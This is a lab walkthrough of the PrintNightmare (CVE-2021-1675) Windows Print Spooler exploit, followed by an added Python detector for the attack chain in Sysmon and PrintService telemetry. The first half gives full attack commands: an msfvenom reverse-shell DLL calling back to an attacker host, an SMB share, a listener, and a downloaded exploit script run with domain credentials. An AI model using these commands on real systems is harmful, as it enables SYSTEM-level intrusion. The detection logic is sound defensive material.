# Check and Prepare

### The Explanation

The Print Spooler service runs as the SYSTEM account, the highest-privileged local account on Windows. You trick the Print Spooler into installing a new printer driver from a UNC path and loading it. In our case the driver is a DLL that, once loaded, returns a reverse shell to our Kali machine. Because the Print Spooler runs as SYSTEM, it is the SYSTEM account that calls back to the Kali machine, not the non-privileged domain user we use to install the driver.

To exploit PrintNightmare, first check whether the Print Spooler service is running on the targets.

### Check that the spooler is active

```
crackmapexec smb 192.168.56.10-23 -M spooler
```

<figure><img src="/files/V2oURJZd8Po4Ad8JI3gv" alt=""><figcaption></figcaption></figure>

```
rpcdump.py @192.168.56.10 | egrep 'MS-RPRN|MS-PAR'
```

<figure><img src="/files/udLTWaUm6XzdoDZcUJAc" alt=""><figcaption></figcaption></figure>

### Set up an SMB share to host our .dll

```
sudo smbserver.py -smb2support "smb" /home/jefe/smb
```

<figure><img src="/files/GkJH0kdOIpaenxtOTMlh" alt=""><figcaption></figcaption></figure>

### Create the reverse shell DLL and place it in the SMB directory

```
msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=192.168.56.31 LPORT=4444 -o /home/jefe/smb/remote.dll
```

<figure><img src="/files/W91MxlV6zd8fiSfCriRn" alt=""><figcaption></figcaption></figure>

### Set up the listener

```
msfconsole
use multi/handler
set payload windows/x64/shell_reverse_tcp
set lhost 192.168.56.31
set lport 4444
run
```

<figure><img src="/files/fACOxj1fhQK8naaPm5WK" alt=""><figcaption></figcaption></figure>

### Download and execute exploit

```
wget https://raw.githubusercontent.com/cube0x0/CVE-2021-1675/main/SharpPrintNightmare/CVE-2021-1675.py
```

```
python3 CVE-2021-1675.py north.newyork.local/claudio.ortiz:babyboy@bronx.north.newyork.local '\\192.168.56.31\smb\remote.dll'
```

### Got Shell?

<figure><img src="/files/LCnznGz3KMHLNQM37qfj" alt=""><figcaption></figcaption></figure>
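The chain walked through above (spooler fetches a driver DLL over SMB, installs it, loads it as SYSTEM, the DLL spawns a shell) leaves a trace on the target at every step. As an added defender-side example that is not part of the original page and not the exploit author's code, the Python below runs detection logic over a handful of constructed event records shaped like a SIEM export of Sysmon and Microsoft-Windows-PrintService/Operational events. Event IDs 316 (driver added) and 808 (plug-in failed to load) from the PrintService channel and Sysmon 1 (process create) and 3 (network connect) are the commonly cited ones; the key=value record layout, the host names, the print-server allow-list and every sample line are assumptions constructed for this example.

```python
"""Detect the PrintNightmare chain from host telemetry (added example, not the page's code).

Stages it looks for, per host:
  smb_fetch               spoolsv.exe opening SMB (445) to a host not on the print-server allow-list (Sysmon 3)
  driver_added            a printer driver added or updated (PrintService 316) - benign on its own
  driver_load_failed      the spooler failed to load a plug-in from the drivers directory (PrintService 808)
  spooler_spawned_process spoolsv.exe spawning a child process (Sysmon 1)

The "key=value | key=value" record format is an assumption of this example, not a real export format.
"""
import re
from collections import defaultdict

# Constructed sample records: one event per line, fields separated by " | ".
SAMPLE_EVENTS = """\
host=BRONX | channel=Sysmon | id=3 | Image=C:\\Windows\\System32\\spoolsv.exe | DestinationIp=192.168.56.31 | DestinationPort=445 | User=NT AUTHORITY\\SYSTEM
host=BRONX | channel=PrintService | id=316 | Message=Printer driver 1234 for Windows x64 was added or updated. Files:- UNIDRV.DLL, kernelbase.dll, remote.dll. No user action is required.
host=BRONX | channel=PrintService | id=808 | Message=The print spooler failed to load a plug-in module C:\\Windows\\System32\\spool\\DRIVERS\\x64\\3\\old\\1\\remote.dll, error code 0x45A.
host=BRONX | channel=Sysmon | id=1 | Image=C:\\Windows\\System32\\cmd.exe | ParentImage=C:\\Windows\\System32\\spoolsv.exe | User=NT AUTHORITY\\SYSTEM
host=FILESRV | channel=Sysmon | id=3 | Image=C:\\Windows\\System32\\spoolsv.exe | DestinationIp=192.168.56.10 | DestinationPort=445 | User=NT AUTHORITY\\SYSTEM
host=FILESRV | channel=PrintService | id=316 | Message=Printer driver HP Universal for Windows x64 was added or updated. Files:- hpcu250u.dll, UNIDRV.DLL. No user action is required.
"""

# Hosts that legitimately serve printer drivers over SMB (constructed allow-list; tune per environment).
KNOWN_PRINT_SERVERS = {"192.168.56.10"}


def parse_event(line):
    """Split one 'key=value | key=value' record into a dict; 'id' becomes an int."""
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    fields["id"] = int(fields["id"])
    return fields


def is_spoolsv(path):
    return path.lower().endswith("\\spoolsv.exe")


def classify(event):
    """Return (stage, detail) for one event, or None if it matches no stage."""
    ch, eid = event["channel"], event["id"]
    if ch == "Sysmon" and eid == 3 and is_spoolsv(event.get("Image", "")):
        # The spooler itself reaching out to SMB on an unknown host is the driver fetch.
        if event.get("DestinationPort") == "445" and event.get("DestinationIp") not in KNOWN_PRINT_SERVERS:
            return ("smb_fetch", "spoolsv.exe connected to SMB on unknown host " + event["DestinationIp"])
    if ch == "PrintService" and eid == 316:
        return ("driver_added", event.get("Message", ""))
    if ch == "PrintService" and eid == 808:
        # Pull the module path out of the message so an analyst sees which file was staged.
        m = re.search(r"plug-in module (\S+?), error code", event.get("Message", ""))
        return ("driver_load_failed", m.group(1) if m else event.get("Message", ""))
    if ch == "Sysmon" and eid == 1 and is_spoolsv(event.get("ParentImage", "")):
        # spoolsv.exe has no business spawning children; this is the payload running as SYSTEM.
        return ("spooler_spawned_process", event.get("Image", ""))
    return None


def analyze(text):
    """Return {host: [(stage, detail), ...]} for every matching event in the export."""
    findings = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        hit = classify(ev)
        if hit:
            findings[ev["host"]].append(hit)
    return dict(findings)


def verdict(stages):
    """Rate a host from the set of stages seen; a lone driver install is only informational."""
    if "spooler_spawned_process" in stages:
        return "critical"
    if "smb_fetch" in stages and stages & {"driver_added", "driver_load_failed"}:
        return "high"
    if "smb_fetch" in stages or "driver_load_failed" in stages:
        return "medium"
    return "info"


def report(text):
    """Return {host: verdict} for the whole export."""
    return {host: verdict({stage for stage, _ in hits}) for host, hits in analyze(text).items()}


if __name__ == "__main__":
    for host, hits in analyze(SAMPLE_EVENTS).items():
        print(host, report(SAMPLE_EVENTS)[host])
        for stage, detail in hits:
            print("  ", stage, "-", detail)
```

In the sample data BRONX shows all four stages and is rated critical, while FILESRV only pulled a driver from an allow-listed print server and is rated info. The allow-list is what keeps the SMB rule quiet in environments that use Point and Print legitimately; the spoolsv.exe child-process rule needs no tuning, since the spooler spawning cmd.exe or powershell.exe is never expected.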
